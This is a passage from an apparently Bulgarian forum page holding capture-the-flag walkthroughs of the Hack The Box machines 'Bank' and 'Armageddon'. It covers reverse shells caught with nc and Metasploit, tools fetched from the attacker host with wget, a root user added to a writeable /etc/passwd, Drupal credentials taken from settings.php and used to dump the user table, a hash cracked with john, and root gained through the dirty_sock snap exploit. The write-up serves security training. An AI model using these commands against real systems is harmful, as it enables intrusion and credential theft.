0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ # Privilege EscalationWe are logged as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is writeable directory and download the file from my local kali system. ┌──(kali㉿kali)-[~/bank] └─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check . ┌──(kali㉿kali)-[~/bank] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 - 10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 - $ cd tmp $ touch file $ ls file vmware-root $ wget http://10.10.14.3:8000/unix-privesc-check --2021-05-11 12:45:15-- http://10.10.14.3:8000/unix-privesc-check Connecting to 10.10.14.3:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 36801 (36K) [application/octet-stream] Saving to: 'unix-privesc-check' 0K .......... .......... .......... ..... 100% 654K=0.05s 2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801] $ Let's upgrade out session to be more intuitive and responsive. $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@bank:/tmp$ export TERM=xterm export TERM=xterm www-data@bank:/tmp$ ^Z zsh: suspended nc -nlvp 1234 ┌──(root💀kali)-[/home/kali/bank] └─# stty raw -echo;fg 148 ⨯ 1 ⚙ [1] + continued nc -nlvp 1234 Now I have tab-completion and all keys register as normal. www-data@bank:/tmp$ chmod +x unix-privesc-check www-data@bank:/tmp$ ./unix-privesc-check standard ...[snip]... ############################################ Checking if anyone except root can change /etc/passwd WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password: $ openssl passwd -1 -salt hacker hacker $1$hacker$TzyKlv0/R/c28R.GAeLw.1 Next, add the user as follows: www-data@bank:/$ nano /etc/passwd ################################# add the user in the document like so: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash ################################# www-data@bank:/$ su hacker Password: root@bank:/# whoami root root@bank:/#
  9. Enumeration Service Scan The service scan reveals two open ports. A web application is running and has interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction. ` # nmap -sC -sV -p-65535 armageddon Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT Nmap scan report for armageddon (10.10.10.233) Host is up (0.050s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds Droopescan Thought to google dropal scanners and got a tool from github called droopescan. # ./droopescan scan drupal -u http://armageddon [+] Plugins found: profile http://armageddon/modules/profile/ php http://armageddon/modules/php/ image http://armageddon/modules/image/ [+] Themes found: seven http://armageddon/themes/seven/ garland http://armageddon/themes/garland/ [+] Possible version(s): 7.56 [+] Possible interesting urls found: Default changelog file - http://armageddon/CHANGELOG.txt [+] Scan finished (0:01:07.454052 elapsed) Searchsploit Further internet searches on the applicable exploits led me to Drupalgeddon and will try it out in the next stage. $ searchsploit drupal -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections | php/webapps/32415.txt Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting | php/webapps/18389.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Exploit ## metasploit drupalgeddon2 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. [*] Sending stage (39282 bytes) to 10.10.10.233 [*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400 meterpreter > sysinfo Computer : armageddon.htb OS : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 Meterpreter : php/linux We have a couple of directories in /var/www/html directory. After traversing the files, I have discovered a config file which contains a password and a username in settings.php within sites/default directory. I have also uploaded some privesc tools such as unix-privesc-check and linenum from meterpreter upload functionality. ls authorize.php cron.php INSTALL.mysql.txt INSTALL.sqlite.txt linenum.sh modules README.txt sites update.php web.config CHANGELOG.txt includes INSTALL.pgsql.txt INSTALL.txt MAINTAINERS.txt out.txt robots.txt themes UPGRADE.txt xmlrpc.php COPYRIGHT.txt index.php install.php LICENSE.txt misc profiles scripts unix-privesc-check cat usersdump.sql <deleted> $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupal', 'username' => 'drupaluser', 'password' => 'CQHEy@9M*m23gBVj', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), <deleted> Next, I'm using the credentials to login to drupal db and enumerate its tables. Following that, I'm dumping the users table from the database 'drupal'. Finally, I am analysing the dump file and discovered credentials for *brucetherealadmin*. mysql -u drupaluser -p -D drupal -e 'show tables;' <deleted> users <deleted> mysqldump -u drupaluser -p drupal users > usersdump.sql cat usersdump.sql <deleted> (1,'brucetherealadmin','$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'), <deleted> Cracking the hash with john was easy and straightforward. john forjohn -w /usr/share/wordlists/rockyou.txt $ cat /home/kali/.john/john.pot $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo Login to the web application with credentials. Remembered there is an ssh service running so I tried logging into it. # ssh [email protected] The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established. ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts. [email protected]'s password: Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5 [brucetherealadmin@armageddon ~]$ I have discovered that the binary *snap* does not require password and is owned by root. brucetherealadmin@armageddon ~]$ sudo -l Matching Defaults entries for brucetherealadmin on armageddon: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User brucetherealadmin may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/snap install * A little research on snap gives us GTFO-bins solutions to the problem. 1. Tried https://gtfobins.github.io/gtfobins/snap/ but did not work. 2. A bit additional research reveals https://github.com/initstring/dirty_sock I have followed the steps from '2' and it did not work. It seems the python version is incorrect. So I coppied the source code of the exploit and pasted it into a new file and ran it with the correct python version. Finally, I was able to root the box by installing the snap exploit, which created a user called dirty_sock:dirty_sock which provides us with root access. The box is quite interesting and it's nice to learn something new such as the snap vulnerability and ways to exploit. All in all, pretty fun box.

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy